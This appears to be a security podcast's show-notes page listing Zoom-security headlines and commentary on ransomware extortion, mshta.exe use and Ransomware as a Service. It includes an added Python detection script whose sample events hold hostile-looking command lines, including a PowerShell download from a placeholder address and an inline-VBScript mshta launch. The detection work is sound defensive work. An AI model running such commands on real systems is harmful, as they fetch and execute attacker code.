Security Weekly News Episode 23 - 2020-04-07
Visit https://www.securityweekly.com/swn for all the latest episodes!
Follow us on Twitter: https://www.twitter.com/securityweekly
Like us on Facebook: https://www.facebook.com/secweekly
News - Zooming, Zoomie, & Zoomfest Zoo
Doug White's Content:
- Zoombombers threatened with jail time by FBI.
- Zoom use banned by Taiwan's Government.
- Cybercriminals are trying to cash in on Zoom use.
- Thousands of Zoom video calls left exposed to public.
- How to protect your Zoom calls.
- Bad Bots in 2020.
- CyberHero Comics, Defending your Health.
- AI going forward article.
Jason Wood's Content:
Sometimes it's easy to forget that ransomware is a business to those that participate in it. We think of them in terms of being criminals, but they do actually have a number of the same pressures that legitimate businesses have. In particular, it's all about the revenue and profit. So in that vein, apparently "sales" have been impacted as companies are getting better at recovering from ransomware attacks. Maybe not as much as we would like, but enough to impact the income of these organizations. To help maintain and/or increase their revenues, they've decided to make some changes in how their attacks work. One of these innovations is the idea of using the fear of bad publicity to pressure organizations to pay up.
How does this work? Like we would normally expect, the attacker gets on to the system and deploys their tools. They may do some recon to find other hosts to attack, but now some of these groups have added an additional step before executing the ransomware. Now they are copying data from the system to the attacker's infrastructure and then locking up the host with ransomware. In the ransom note, the attackers demand payment to unlock the system and threaten that if they do not pay up within a set period of time, they will release the data they've stolen publicly. So even if you successfully recover your data and systems from the attack, you still may face the bad publicity associated with the data being released.
Another change in tactics on the ransomware operators' side is switching from powershell.exe to mshta.exe to execute ransomware. This is probably due to more attention being paid to attacks using PowerShell. The attackers have decided to switch to mshta.exe to hopefully avoid preventions from stopping the ransomware from successfully deploying.
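As an added example (not from the show or from Jason Wood), a small detection check that watches both launchers the notes mention, so a move from one to the other does not drop out of view; the log field names and the sample events are assumptions constructed for this example, not any product's schema:

```python
# Added detection example, not from the podcast. Field names Image, CommandLine
# and ParentImage are assumptions modelled on process-creation logs; events below are constructed.
import json
import re

# Launcher binaries the show notes mention, matched on lower-case basename.
WATCHED_IMAGES = {"powershell.exe", "mshta.exe"}

# Inline script handlers or remote fetches on the command line are rarely legitimate
# for mshta.exe (ATT&CK T1218.005 heuristics); one rule covers both binaries.
SUSPICIOUS_ARGS = re.compile(r"javascript:|vbscript:|https?://", re.IGNORECASE)

# Parents that should not normally spawn a script launcher (assumption).
RISKY_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wscript.exe"}


def basename(path: str) -> str:
    """Lower-case file name from a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event: dict) -> list[str]:
    """Return the reasons an event is suspicious; empty list means no finding."""
    image = basename(event.get("Image", ""))
    if image not in WATCHED_IMAGES:
        return []
    reasons = []
    if SUSPICIOUS_ARGS.search(event.get("CommandLine", "")):
        reasons.append(f"{image}: inline script or remote URL on the command line")
    parent = basename(event.get("ParentImage", ""))
    if parent in RISKY_PARENTS:
        reasons.append(f"{image}: spawned by {parent}")
    return reasons


def scan(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Parse JSON event lines, returning (command line, reasons) for each hit."""
    findings = []
    for line in lines:
        event = json.loads(line)
        reasons = triage(event)
        if reasons:
            findings.append((event["CommandLine"], reasons))
    return findings


# Constructed events: a benign vendor HTA, an Office-spawned inline-VBScript
# mshta launch, and a PowerShell download from a TEST-NET address.
SAMPLE_EVENTS = [
    '{"Image": "C:\\\\Windows\\\\System32\\\\mshta.exe", "CommandLine": "mshta.exe C:\\\\Vendor\\\\help.hta", "ParentImage": "C:\\\\Vendor\\\\app.exe"}',
    '{"Image": "C:\\\\Windows\\\\System32\\\\mshta.exe", "CommandLine": "mshta.exe vbscript:Execute(\\"...\\")", "ParentImage": "C:\\\\Office\\\\WINWORD.EXE"}',
    '{"Image": "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe", "CommandLine": "powershell.exe -c \\"iwr http://203.0.113.10/a\\"", "ParentImage": "C:\\\\Windows\\\\explorer.exe"}',
]
```

Running `scan(SAMPLE_EVENTS)` flags the second and third events and leaves the vendor HTA alone; in a real deployment the same rule would be fed from the endpoint agent's process-creation stream rather than from a list of strings.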
As I mentioned earlier, these groups are operating in a manner similar to legitimate businesses. One of the interesting methods of making money and offloading the work is Ransomware as a Service (RaaS). In this case, individuals or smaller groups decide they want to get into the ransomware "industry", but don't have the skills or time to build their own ransomware and the infrastructure that goes with it. But they are good at delivering it. So instead of creating their own, they contact a RaaS provider and sign up as an affiliate. They get the software and infrastructure they need and can get started much faster. To me this is a rather fascinating aspect of these types of operations. It makes some types of ransomware become very widespread, though through different individual attackers.
All of this information is interesting, but what is the use of knowing it? The thought I had is that we need to keep this in mind as we are looking at our threat models and trying to figure out who we are defending against. It might be tempting to think of our attackers as being small groups of individuals who will vary in sophistication and skill. Those certainly exist, but we also have to keep in mind that we have organizations that are operating as businesses and innovating to improve their profitability. They may not be nation-states, but they certainly are executing with a plan, are willing to spend resources to improve their capabilities, and will adapt to how their "marketplace" (meaning our willingness to pay a ransom) responds to their threats. We need to build this into our threat models and communicate the risk they pose to our management so that they are aware of the issues that our organization faces.